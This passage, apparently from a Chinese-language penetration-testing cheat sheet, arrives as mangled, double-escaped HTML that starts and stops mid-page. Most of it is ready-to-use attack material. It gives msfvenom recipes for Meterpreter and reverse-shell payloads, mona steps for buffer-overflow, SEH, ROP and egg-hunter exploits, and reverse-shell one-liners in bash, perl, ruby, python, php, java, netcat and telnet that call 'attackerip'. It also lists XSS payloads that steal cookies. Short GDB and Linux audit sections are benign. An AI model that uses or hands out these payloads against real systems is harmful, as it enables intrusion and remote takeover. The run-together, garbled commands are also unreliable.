class=\"wp-block-preformatted\">msfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=&amp;lt;IP&nbsp;Address&amp;gt;&nbsp;X&nbsp;&amp;gt;&nbsp;system.exemsfvenom&nbsp;-p php\/meterpreter\/reverse_tcp LHOST=&amp;lt;IP&nbsp;Address&amp;gt;&nbsp;LPORT=443&nbsp;R&nbsp;&amp;gt;&nbsp;exploit.phpmsfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=&amp;lt;IP&nbsp;Address&amp;gt;&nbsp;LPORT=443&nbsp;-e&nbsp;-a x86&nbsp;--platform win&nbsp;-f asp&nbsp;-o file.aspmsfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=&amp;lt;IP&nbsp;Address&amp;gt;&nbsp;LPORT=443&nbsp;-e x86\/shikata_ga_nai&nbsp;-b&nbsp;\"x00\"&nbsp;-a x86&nbsp;--platform win&nbsp;-f c<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u5728 Linux \u4e0b\u53cd\u5f39\u7684 Meterpreter Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p linux\/x86\/meterpreter\/reverse_tcp LHOST=&amp;lt;IP&nbsp;Address&amp;gt;&nbsp;LPORT=443&nbsp;-e-f elf&nbsp;-a x86&nbsp;--platform linux&nbsp;-o shell<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 Shell (C Shellcode)<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p windows\/shell_reverse_tcp LHOST=127.0.0.1&nbsp;LPORT=443&nbsp;-b&nbsp;\"x00x0ax0d\"-a x86&nbsp;--platform win&nbsp;-f c<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 Python Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p cmd\/unix\/reverse_python LHOST=127.0.0.1&nbsp;LPORT=443&nbsp;-o shell.py<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 ASP Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=&amp;lt;Your&nbsp;IP&nbsp;Address&amp;gt;&nbsp;LPORT=&amp;lt;Your&nbsp;Port&nbsp;to&nbsp;ConnectOn&amp;gt;&nbsp;-f asp&nbsp;-a x86&nbsp;--platform win&nbsp;-o shell.asp<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 Bash Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p cmd\/unix\/reverse_bash LHOST=&amp;lt;Your&nbsp;IP&nbsp;Address&amp;gt;&nbsp;LPORT=&amp;lt;Your&nbsp;Port&nbsp;to&nbsp;Connect&nbsp;On&amp;gt;&nbsp;-o shell.sh<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 PHP Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p php\/meterpreter_reverse_tcp LHOST=&amp;lt;YourIPAddress&amp;gt;&nbsp;LPORT=&amp;lt;YourPorttoConnectOn&amp;gt;-o shell.phpadd&nbsp;&amp;lt;?php at the beginningperl&nbsp;-i~&nbsp;-0777pe's\/^\/&amp;lt;?php n\/'&nbsp;shell.php<\/pre>\n\n\n<h3 class=\"wp-block-heading\">MSF \u751f\u6210\u53cd\u5f39 Win Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=&amp;lt;Your&nbsp;IP&nbsp;Address&amp;gt;&nbsp;LPORT=&amp;lt;Your&nbsp;Port&nbsp;to&nbsp;ConnectOn&amp;gt;&nbsp;-f exe&nbsp;-a x86&nbsp;--platform win&nbsp;-o shell.exe<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Linux \u5e38\u7528\u5b89\u5168\u547d\u4ee4<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u4f7f\u7528 uid \u67e5\u627e\u5bf9\u5e94\u7684\u7a0b\u5e8ffind&nbsp;\/&nbsp;-uid&nbsp;0&nbsp;-perm&nbsp;-4000&nbsp;# \u67e5\u627e\u54ea\u91cc\u62e5\u6709\u5199\u6743\u9650find&nbsp;\/&nbsp;-perm&nbsp;-o=w&nbsp;# \u67e5\u627e\u540d\u79f0\u4e2d\u5305\u542b\u70b9\u548c\u7a7a\u683c\u7684\u6587\u4ef6find&nbsp;\/&nbsp;-name&nbsp;\" \"&nbsp;-printfind&nbsp;\/&nbsp;-name&nbsp;\"..\"&nbsp;-printfind&nbsp;\/&nbsp;-name&nbsp;\". \"&nbsp;-printfind&nbsp;\/&nbsp;-name&nbsp;\" \"&nbsp;-print&nbsp;# \u67e5\u627e\u4e0d\u5c5e\u4e8e\u4efb\u4f55\u4eba\u7684\u6587\u4ef6find&nbsp;\/&nbsp;-nouser&nbsp;# \u67e5\u627e\u672a\u94fe\u63a5\u7684\u6587\u4ef6lsof&nbsp;+L1&nbsp;# \u83b7\u53d6\u8fdb\u7a0b\u6253\u5f00\u7aef\u53e3\u7684\u4fe1\u606flsof&nbsp;-i&nbsp;# \u770b\u770b ARP \u8868\u4e2d\u662f\u5426\u6709\u5947\u602a\u7684\u4e1c\u897farp&nbsp;-a# \u67e5\u770b\u6240\u6709\u8d26\u6237getent passwd&nbsp;# \u67e5\u770b\u6240\u6709\u7528\u6237\u7ec4getent&nbsp;group&nbsp;# \u5217\u4e3e\u6240\u6709\u7528\u6237\u7684 crontabsfor user in $(getent passwd|cut -f1 -d:); doecho\"### Crontabs for $user ####\"; crontab -u $user-l; done# \u751f\u6210\u968f\u673a\u5bc6\u7801cat&nbsp;\/dev\/urandom|&nbsp;tr&nbsp;-dc&nbsp;\u2018a-zA-Z0-9-_!@#$%^&amp;amp;*()_+{}|:&amp;lt;&amp;gt;?=\u2019|fold&nbsp;-w&nbsp;12|&nbsp;head&nbsp;-n&nbsp;4# \u67e5\u627e\u6240\u6709\u4e0d\u53ef\u4fee\u6539\u7684\u6587\u4ef6find&nbsp;.&nbsp;|&nbsp;xargs&nbsp;-I file lsattr&nbsp;-a file&nbsp;2&amp;gt;\/dev\/null&nbsp;|&nbsp;grep&nbsp;\u2018^\u2026.i\u2019&nbsp;# \u4f7f\u6587\u4ef6\u4e0d\u53ef\u4fee\u6539chattr&nbsp;-i file<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Windows \u7f13\u51b2\u533a\u6ea2\u51fa\u5229\u7528\u547d\u4ee4<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">msfvenom&nbsp;-p windows\/shell_bind_tcp&nbsp;-a x86&nbsp;--platform win&nbsp;-b&nbsp;\"x00\"&nbsp;-f cmsfvenom&nbsp;-p windows\/meterpreter\/reverse_tcp LHOST=X.X.X.X LPORT=443&nbsp;-a x86&nbsp;--platform win&nbsp;-e x86\/shikata_ga_nai&nbsp;-b&nbsp;\"x00\"&nbsp;-f c&nbsp;COMMONLY USED BAD CHARACTERS:x00x0ax0dx20&nbsp;For&nbsp;http requestx00x0ax0dx20x1ax2cx2e3ax5c&nbsp;Ending&nbsp;with&nbsp;(0nr_)&nbsp;# \u5e38\u7528\u547d\u4ee4:pattern createpattern offset&nbsp;(EIP&nbsp;Address)pattern offset&nbsp;(ESP&nbsp;Address)add garbage upto EIP valueandadd&nbsp;(JMP ESP address)&nbsp;in&nbsp;EIP&nbsp;.&nbsp;(ESP&nbsp;=&nbsp;shellcode&nbsp;)&nbsp;!pvefindaddr pattern_create&nbsp;5000!pvefindaddr suggest!pvefindaddr modules!pvefindaddr nosafeseh&nbsp;!mona config&nbsp;-set&nbsp;workingfolder C:Mona%p!mona config&nbsp;-get&nbsp;workingfolder!mona mod!mona bytearray&nbsp;-b&nbsp;\"x00x0a\"!mona pc&nbsp;5000!mona po EIP!mona suggest<\/pre>\n\n\n<h3 class=\"wp-block-heading\">SEH \u2013 \u7ed3\u6784\u5316\u5f02\u5e38\u5904\u7406<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aSEH(\u201cStructured Exception Handling\u201d)\uff0c\u5373\u7ed3\u6784\u5316\u5f02\u5e38\u5904\u7406\uff0c\u662f windows \u64cd\u4f5c\u7cfb\u7edf\u63d0\u4f9b\u7ed9\u7a0b\u5e8f\u8bbe\u8ba1\u8005\u7684\u5f3a\u6709\u529b\u7684\u5904\u7406\u7a0b\u5e8f\u9519\u8bef\u6216\u5f02\u5e38\u7684\u6b66\u5668\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/en.wikipedia.org\/wiki\/Microsoft-specific_exception_handling_mechanisms#SEH# http:\/\/baike.baidu.com\/view\/243131.htm!mona suggest!mona nosafesehnseh=\"xebx06x90x90\"&nbsp;(next&nbsp;seh chain)iseh=&nbsp;!pvefindaddr p1&nbsp;-n&nbsp;-o&nbsp;-i&nbsp;(POP POP RETRUN&nbsp;or&nbsp;POPr32,POPr32,RETN)<\/pre>\n\n\n<h3 class=\"wp-block-heading\">ROP (DEP)<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aROP(\u201cReturn-Oriented Programming\u201d)\u662f\u8ba1\u7b97\u673a\u5b89\u5168\u6f0f\u6d1e\u5229\u7528\u6280\u672f\uff0c\u8be5\u6280\u672f\u5141\u8bb8\u653b\u51fb\u8005\u5728\u5b89\u5168\u9632\u5fa1\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u4ee3\u7801\uff0c\u5982\u4e0d\u53ef\u6267\u884c\u7684\u5185\u5b58\u548c\u4ee3\u7801\u7b7e\u540d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">DEP(\u201cData Execution Prevention\u201d)\u662f\u4e00\u5957\u8f6f\u786c\u4ef6\u6280\u672f\uff0c\u5728\u5185\u5b58\u4e0a\u4e25\u683c\u5c06\u4ee3\u7801\u548c\u6570\u636e\u8fdb\u884c\u533a\u5206\uff0c\u9632\u6b62\u6570\u636e\u5f53\u505a\u4ee3\u7801\u6267\u884c\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/en.wikipedia.org\/wiki\/Return-oriented_programming# https:\/\/zh.wikipedia.org\/wiki\/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B# https:\/\/en.wikipedia.org\/wiki\/Data_Execution_Prevention# http:\/\/baike.baidu.com\/item\/DEP\/7694630!mona modules!mona ropfunc&nbsp;-m&nbsp;*.dll&nbsp;-cpb&nbsp;\"x00x09x0a\"!mona rop&nbsp;-m&nbsp;*.dll&nbsp;-cpb&nbsp;\"x00x09x0a\"&nbsp;(auto&nbsp;suggest)<\/pre>\n\n\n<h3 class=\"wp-block-heading\">ASLR \u2013 \u5730\u5740\u7a7a\u95f4\u683c\u5c40\u968f\u673a\u5316<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/en.wikipedia.org\/wiki\/Address_space_layout_randomization# http:\/\/baike.baidu.com\/view\/3862310.htm!mona noaslr<\/pre>\n\n\n<h3 class=\"wp-block-heading\">\u5bfb\u86cb(EGG Hunter)\u6280\u672f<\/h3>\n\n\n<p class=\"wp-block-paragraph\">Egg hunting\u8fd9\u79cd\u6280\u672f\u53ef\u4ee5\u88ab\u5f52\u4e3a\u201c\u5206\u7ea7shellcode\u201d\uff0c\u5b83\u4e3b\u8981\u53ef\u4ee5\u652f\u6301\u4f60\u7528\u4e00\u5c0f\u6bb5\u7279\u5236\u7684shellcode\u6765\u627e\u5230\u4f60\u7684\u5b9e\u9645\u7684\uff08\u66f4\u5927\u7684\uff09shellcode\uff08\u6211\u4eec\u7684\u2018\u9e21\u86cb\u2018\uff09\uff0c\u539f\u7406\u5c31\u662f\u901a\u8fc7\u5728\u5185\u5b58\u4e2d\u641c\u7d22\u6211\u4eec\u7684\u6700\u7ec8shellcode\u3002\u6362\u53e5\u8bdd\u8bf4\uff0c\u4e00\u6bb5\u77ed\u4ee3\u7801\u5148\u6267\u884c\uff0c\u7136\u540e\u518d\u53bb\u5bfb\u627e\u771f\u6b63\u7684shellcode\u5e76\u6267\u884c\u3002\u2013 \u53c2\u8003\u81ea<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.tiejiang.org\/goto\/o5p5\" rel=\"noreferrer noopener\" rel=\"nofollow\" >\u770b\u96ea\u8bba\u575b<\/a>\uff0c\u66f4\u591a\u8be6\u60c5\u53ef\u4ee5\u67e5\u9605\u6211\u5728\u4ee3\u7801\u6ce8\u91ca\u4e2d\u589e\u52a0\u7684\u94fe\u63a5\u3002<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/# http:\/\/www.pediy.com\/kssd\/pediy12\/116190\/831793\/45248.pdf# http:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/4.html!mona jmp&nbsp;-r esp!mona egg&nbsp;-t lxxlxebxc4&nbsp;(jump backward&nbsp;-60)buff=lxxllxxl+shell!mona egg&nbsp;-t&nbsp;'w00t'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">GDB Debugger \u5e38\u7528\u547d\u4ee4<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u8bbe\u7f6e\u65ad\u70b9break *_start&nbsp;# \u6267\u884c\u4e0b\u4e00\u4e2a\u547d\u4ee4nextstepns&nbsp;# \u7ee7\u7eed\u6267\u884ccontinuec&nbsp;# \u6570\u636echecking&nbsp;'REGISTERS'&nbsp;and&nbsp;'MEMORY'# \u663e\u793a\u5bc4\u5b58\u5668\u7684\u503c: (Decimal,Binary,Hex)print \/d \u2013&amp;gt; Decimalprint&nbsp;\/t&nbsp;\u2013&amp;gt;&nbsp;Binaryprint&nbsp;\/x&nbsp;\u2013&amp;gt;&nbsp;HexO\/P&nbsp;:(gdb)&nbsp;print&nbsp;\/d $eax$17&nbsp;=&nbsp;13(gdb)&nbsp;print&nbsp;\/t $eax$18&nbsp;=&nbsp;1101(gdb)&nbsp;print&nbsp;\/x $eax$19&nbsp;=&nbsp;0xd(gdb)&nbsp;# \u663e\u793a\u7279\u5b9a\u5185\u5b58\u5730\u5740\u7684\u503ccommand : x\/nyz (Examine)n&nbsp;\u2013&amp;gt;&nbsp;Number&nbsp;of fields to display&nbsp;==&amp;gt;y&nbsp;\u2013&amp;gt;&nbsp;Format&nbsp;for&nbsp;output&nbsp;==&amp;gt;&nbsp;c&nbsp;(character)&nbsp;,&nbsp;d&nbsp;(decimal)&nbsp;,&nbsp;x&nbsp;(Hexadecimal)z&nbsp;\u2013&amp;gt;&nbsp;Size&nbsp;of field to be displayed&nbsp;==&amp;gt;&nbsp;b&nbsp;(byte)&nbsp;,&nbsp;h&nbsp;(halfword),&nbsp;w&nbsp;(word&nbsp;32&nbsp;Bit)<\/pre>\n\n\n<h3 class=\"wp-block-heading\">BASH \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">bash&nbsp;-i&nbsp;&amp;gt;&amp;amp;&nbsp;\/dev\/tcp\/X.X.X.X\/4430&amp;gt;&amp;amp;1&nbsp;exec&nbsp;\/bin\/bash&nbsp;0&amp;amp;02&amp;gt;&amp;amp;0exec&nbsp;\/bin\/bash&nbsp;0&amp;amp;02&amp;gt;&amp;amp;00&amp;lt;&amp;amp;196;exec&nbsp;196&amp;lt;&amp;gt;\/dev\/tcp\/attackerip\/4444;&nbsp;sh&nbsp;&amp;lt;&amp;amp;196&amp;gt;&amp;amp;1962&amp;gt;&amp;amp;1960&amp;lt;&amp;amp;196;exec&nbsp;196&amp;lt;&amp;gt;\/dev\/tcp\/attackerip\/4444;&nbsp;sh&nbsp;&amp;lt;&amp;amp;196&amp;gt;&amp;amp;1962&amp;gt;&amp;amp;196&nbsp;exec&nbsp;5&amp;lt;&amp;gt;\/dev\/tcp\/attackerip\/4444&nbsp;cat&nbsp;&amp;lt;&amp;amp;5&nbsp;|&nbsp;while&nbsp;read line;&nbsp;do&nbsp;$line&nbsp;2&amp;gt;&amp;amp;5&nbsp;&amp;gt;&amp;amp;5;&nbsp;done&nbsp;# or: while read line 0&amp;lt;&amp;amp;5; do $line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; doneexec&nbsp;5&amp;lt;&amp;gt;\/dev\/tcp\/attackerip\/4444&nbsp;cat&nbsp;&amp;lt;&amp;amp;5&nbsp;|&nbsp;while&nbsp;read line;&nbsp;do&nbsp;$line&nbsp;2&amp;gt;&amp;amp;5&nbsp;&amp;gt;&amp;amp;5;&nbsp;done&nbsp;# or:while&nbsp;read line&nbsp;0&amp;lt;&amp;amp;5;&nbsp;do&nbsp;$line&nbsp;2&amp;gt;&amp;amp;5&nbsp;&amp;gt;&amp;amp;5;&nbsp;done&nbsp;\/bin\/bash&nbsp;-i&nbsp;&amp;gt;&nbsp;\/dev\/tcp\/attackerip\/80800&amp;lt;&amp;amp;12&amp;gt;&amp;amp;1\/bin\/bash&nbsp;-i&nbsp;&amp;gt;\/dev\/tcp\/X.X.X.X\/4430&amp;lt;&amp;amp;12&amp;gt;&amp;amp;1<\/pre>\n\n\n<h3 class=\"wp-block-heading\">PERL \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">perl&nbsp;-MIO&nbsp;-e&nbsp;'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"attackerip:443\");STDIN-&amp;gt;fdopen($c,r);$~-&amp;gt;fdopen($c,w);system$_ while&amp;lt;&amp;gt;;'# Win \u5e73\u53f0perl&nbsp;-MIO&nbsp;-e&nbsp;'$c=new IO::Socket::INET(PeerAddr,\"attackerip:4444\");STDIN-&amp;gt;fdopen($c,r);$~-&amp;gt;fdopen($c,w);system$_ while&amp;lt;&amp;gt;;'perl&nbsp;-e&nbsp;'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&amp;gt;&amp;amp;S\");open(STDOUT,\"&amp;gt;&amp;amp;S\");open(STDERR,\"&amp;gt;&amp;amp;S\");exec(\"\/bin\/sh -i\");};\u2019<\/pre>\n\n\n<h3 class=\"wp-block-heading\">RUBY \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">ruby&nbsp;-rsocket&nbsp;-e&nbsp;'exit if fork;c=TCPSocket.new(\"attackerip\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'&nbsp;# Win \u5e73\u53f0ruby -rsocket -e 'c=TCPSocket.new(\"attackerip\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'ruby&nbsp;-rsocket&nbsp;-e&nbsp;'f=TCPSocket.open(\"attackerip\",\"443\").to_i;exec sprintf(\"\/bin\/sh -i &amp;lt;&amp;amp;%d &amp;gt;&amp;amp;%d 2&amp;gt;&amp;amp;%d\",f,f,f)'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">PYTHON \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">python&nbsp;-c&nbsp;'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attackerip\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">PHP \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">php&nbsp;-r&nbsp;'$sock=fsockopen(\"attackerip\",443);exec(\"\/bin\/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3\");'<\/pre>\n\n\n<h3 class=\"wp-block-heading\">JAVA \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">r&nbsp;=&nbsp;Runtime.getRuntime()p&nbsp;=&nbsp;r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&amp;lt;&amp;gt;\/dev\/tcp\/attackerip\/443;cat &amp;lt;&amp;amp;5 | while read line; do $line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done\"]&nbsp;as&nbsp;String[])p.waitFor()<\/pre>\n\n\n<h3 class=\"wp-block-heading\">NETCAT \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">nc&nbsp;-e&nbsp;\/bin\/sh attackerip&nbsp;4444nc&nbsp;-e&nbsp;\/bin\/sh&nbsp;192.168.37.10443# \u5982\u679c -e \u53c2\u6570\u88ab\u7981\u7528\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u4ee5\u4e0b\u547d\u4ee4# mknod backpipe p &amp;amp;&amp;amp; nc attackerip 443 0&amp;lt;backpipe | \/bin\/bash 1&amp;gt;backpipe\/bin\/sh | nc attackerip 443rm&nbsp;-f&nbsp;\/tmp\/p;&nbsp;mknod&nbsp;\/tmp\/p p&nbsp;&amp;amp;&amp;amp;&nbsp;nc attackerip&nbsp;44430\/tmp\/#&nbsp;\u5982\u679c\u4f60\u5b89\u88c5\u9519\u4e86&nbsp;netcat&nbsp;\u7684\u7248\u672c\uff0c\u8bf7\u5c1d\u8bd5\u4ee5\u4e0b\u547d\u4ee4rm&nbsp;\/tmp\/f;mkfifo&nbsp;\/tmp\/f;cat&nbsp;\/tmp\/f|\/bin\/sh&nbsp;-i&nbsp;2&amp;gt;&amp;amp;1|nc attackerip&nbsp;&amp;gt;\/tmp\/f<\/pre>\n\n\n<h3 class=\"wp-block-heading\">TELNET \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u5982\u679c netcat \u4e0d\u53ef\u7528\u6216\u8005 \/dev\/tcpmknod backpipe p&nbsp;&amp;amp;&amp;amp;&nbsp;telnet attackerip&nbsp;4430&amp;lt;backpipe&nbsp;|&nbsp;\/bin\/bash&nbsp;1&amp;gt;backpipe<\/pre>\n\n\n<h3 class=\"wp-block-heading\">XTERM \u53cd\u5f39 Shell<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># http:\/\/baike.baidu.com\/view\/418628.htm# \u5f00\u542f X \u670d\u52a1\u5668 (:1 \u2013 \u76d1\u542c TCP \u7aef\u53e3 6001)apt-get&nbsp;install xnestXnest&nbsp;:1# \u8bb0\u5f97\u6388\u6743\u6765\u81ea\u76ee\u6807 IP \u7684\u8fde\u63a5xterm&nbsp;-display&nbsp;127.0.0.1:1# \u6388\u6743\u8bbf\u95eexhost&nbsp;+targetip&nbsp;# \u5728\u76ee\u6807\u673a\u5668\u4e0a\u8fde\u63a5\u56de\u6211\u4eec\u7684 X \u670d\u52a1\u5668xterm&nbsp;-display attackerip:1\/usr\/openwin\/bin\/xterm&nbsp;-display attackerip:1or$ DISPLAY=attackerip:0&nbsp;xterm<\/pre>\n\n\n<h3 class=\"wp-block-heading\">XSS \u5907\u5fd8\u5f55<\/h3>\n\n\n<pre class=\"wp-block-preformatted\">https:\/\/www.owasp.org\/index.php\/XSS_Filter_Evasion_Cheat_Sheet(\"&amp;lt; iframes &amp;gt; src=http:\/\/IP:PORT &amp;lt;\/ iframes &amp;gt;\")&nbsp;&amp;lt;script&amp;gt;document.location=http:\/\/IP:PORT&amp;lt;\/script&amp;gt;';alert(String.fromCharCode(88,83,83))\/\/';alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\u2013&amp;gt;&amp;lt;\/SCRIPT&amp;gt;\"&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;\/SCRIPT&amp;gt;&nbsp;\";!\u2013\"&amp;lt;XSS&amp;gt;=&amp;amp;amp;amp;{()}&nbsp;&amp;lt;IMG SRC=\"javascript:alert('XSS');\"&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;IMG&nbsp;\"\"\"&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\")&amp;lt;\/SCRIPT&amp;gt;\"\"&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;amp;#106;&amp;amp;amp;amp;#97;&amp;amp;amp;amp;#118;&amp;amp;amp;amp;#97;&amp;amp;amp;amp;#115;&amp;amp;amp;amp;#99;&amp;amp;amp;amp;#114;&amp;amp;amp;amp;#105;&amp;amp;amp;amp;#112;&amp;amp;amp;amp;#116;&amp;amp;amp;amp;#58;&amp;amp;amp;amp;#97;&amp;amp;amp;amp;#108;&amp;amp;amp;amp;#101;&amp;amp;amp;amp;#114;&amp;amp;amp;amp;#116;&amp;amp;amp;amp;#40;&amp;amp;amp;amp;#39;&amp;amp;amp;amp;#88;&amp;amp;amp;amp;#83;&amp;amp;amp;amp;#83;&amp;amp;amp;amp;#39;&amp;amp;amp;amp;#41;&amp;gt;&nbsp;&amp;lt;IMG SRC=&amp;amp;amp;amp;#0000106&amp;amp;amp;amp;#0000097&amp;amp;amp;amp;#0000118&amp;amp;amp;amp;#0000097&amp;amp;amp;amp;#0000115&amp;amp;amp;amp;#0000099&amp;amp;amp;amp;#0000114&amp;amp;amp;amp;#0000105&amp;amp;amp;amp;#0000112&amp;amp;amp;amp;#0000116&amp;amp;amp;amp;#0000058&amp;amp;amp;amp;#0000097&amp;amp;amp;amp;#0000108&amp;amp;amp;amp;#0000101&amp;amp;amp;amp;#0000114&amp;amp;amp;amp;#0000116&amp;amp;amp;amp;#0000040&amp;amp;amp;amp;#0000039&amp;amp;amp;amp;#0000088&amp;amp;amp;amp;#0000083&amp;amp;amp;amp;#0000083&amp;amp;amp;amp;#0000039&amp;amp;amp;amp;#0000041&amp;gt;&amp;lt;IMG SRC=\"jav ascript:alert('XSS');\"&amp;gt;&nbsp;perl -e 'print \"&amp;lt;IMG SRC=javascript:alert(\"XSS\")&amp;gt;\";' &amp;gt; out&nbsp;&amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[\/|]^`=alert(\"XSS\")&amp;gt;&nbsp;(\"&amp;gt;&amp;lt;&nbsp;iframes http:\/\/google.com &amp;lt; iframes &amp;gt;)&nbsp;&amp;lt;BODY BACKGROUND=\"javascript:alert('XSS')\"&amp;gt;&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\u201djavascript:alert('XSS');\"&amp;gt;&amp;lt;\/FRAMESET&amp;gt;\"&amp;gt;&amp;lt;script&nbsp;&amp;gt;alert(document.cookie)&amp;lt;\/script&amp;gt;%253cscript%253ealert(document.cookie)%253c\/script%253e\"&amp;gt;&amp;lt;s\"%2b\"cript&amp;gt;alert(document.cookie)&amp;lt;\/script&amp;gt;%22\/%3E%3CBODY%20\u03bfnl\u03bfad=\u2019document.write(%22%3Cs%22%2b%22cript%20src=http:\/\/my.box.com\/xss.js%3E%3C\/script%3E%22)'%3E&amp;lt;img src=asdf \u03bfnerr\u03bfr=alert(document.cookie)&amp;gt;<\/pre>\n\n\n<h3 class=\"wp-block-heading\">SSH Over SCTP (\u4f7f\u7528 Socat)<\/h3>\n\n\n<pre class=\"wp-block-preformatted\"># \u8fdc\u7aef\u670d\u52a1\u5668# \u5047\u8bbe\u4f60\u51c6\u5907\u8ba9 SCTP socket \u76d1\u542c\u7aef\u53e3 80\/SCTP \u5e76\u4e14 sshd \u7aef\u53e3\u5728 22\/TCP$ socat SCTP-LISTEN:80,fork TCP:localhost:22# \u672c\u5730\u7aef# \u5c06 SERVER_IP \u6362\u6210\u8fdc\u7aef\u670d\u52a1\u5668\u7684\u5730\u5740\uff0c\u7136\u540e\u5c06 80 \u6362\u6210 SCTP \u76d1\u542c\u7684\u7aef\u53e3\u53f7$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80# \u521b\u5efa socks \u4ee3\u7406# \u66ff\u6362 username \u548c -p \u7684\u7aef\u53e3\u53f7$ ssh&nbsp;-lusername localhost&nbsp;-D&nbsp;8080&nbsp;-p&nbsp;1337<\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u6d0b\u8471\u7f51\u7edc<\/p>\n\n\n<pre class=\"wp-block-preformatted\"># \u5b89\u88c5\u670d\u52a1$ apt-get&nbsp;install tor torsocks&nbsp;# \u7ed1\u5b9a ssh \u5230 tor \u670d\u52a1\u7aef\u53e3 80# \/etc\/tor\/torrcSocksPolicy&nbsp;accept127.0.0.1SocksPolicy&nbsp;accept192.168.0.0\/16Lognoticefile&nbsp;\/var\/log\/tor\/notices.logRunAsDaemon&nbsp;1HiddenServiceDir&nbsp;\/var\/lib\/tor\/ssh_hidden_service\/HiddenServicePort&nbsp;80127.0.0.1:22PublishServerDescriptor&nbsp;0$&nbsp;\/etc\/init.d\/tor start$ cat&nbsp;\/var\/lib\/tor\/ssh_hidden_service\/hostname3l5zstvt1zk5jhl662.onion&nbsp;# ssh \u5ba2\u6237\u7aef\u8fde\u63a5$ apt-getinstall torsocks$ torsocks ssh&nbsp;login@3l5zstvt1zk5jhl662.onion&nbsp;-p80<\/pre>\n\n\n<h3 class=\"wp-block-heading\">Metagoofil \u2013 \u5143\u6570\u636e\u6536\u96c6\u5de5\u5177<\/h3>\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\uff1aMetagoofil 